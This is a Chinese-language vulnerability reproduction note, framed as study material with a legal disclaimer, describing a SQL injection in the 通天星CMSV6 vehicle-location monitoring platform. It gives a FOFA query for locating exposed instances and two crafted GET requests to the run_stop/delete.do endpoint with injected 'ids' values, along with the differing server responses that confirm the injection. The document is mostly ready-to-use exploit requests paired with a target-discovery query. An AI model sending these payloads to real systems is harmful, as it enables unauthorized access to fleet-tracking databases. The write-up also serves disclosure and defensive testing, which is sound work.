免责声明:
本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
漏洞描述
通天星CMSV6车载定位监控平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。
fofa语句
body="/808gps/"
漏洞复现
打开页面
构造payload
payload_1 请求
GET /run_stop/delete.do;downloadLogger.action?ids=1)--+&loadAll=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
payload_1 响应
HTTP/1.1 200
Set-Cookie: JSESSIONID=1F53FD95C492A2A4B80879E048C53064; Path=/; HttpOnly
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,x-ui-request,lang,userId,token,csrftoken,Authorization,Access-Control-Allow-Headers
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Disposition: inline;filename=f.txt
vary: accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 02 Apr 2024 15:48:00 GMT
Connection: close
Content-Length: 85
{"result":0,"message":"OK","data":"","pagination":"","infos":"","key":"","resMap":""}
payload_2 请求
GET /run_stop/delete.do;downloadLogger.action?ids=1)&loadAll=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br
payload_2 响应
HTTP/1.1 200
Set-Cookie: JSESSIONID=1F53FD95C492A2A4B80879E048C53064; Path=/; HttpOnly
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,x-ui-request,lang,userId,token,csrftoken,Authorization,Access-Control-Allow-Headers
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Disposition: inline;filename=f.txt
vary: accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 02 Apr 2024 15:48:00 GMT
Connection: close
Content-Length: 85
{"message":"服务器异常","result":10001}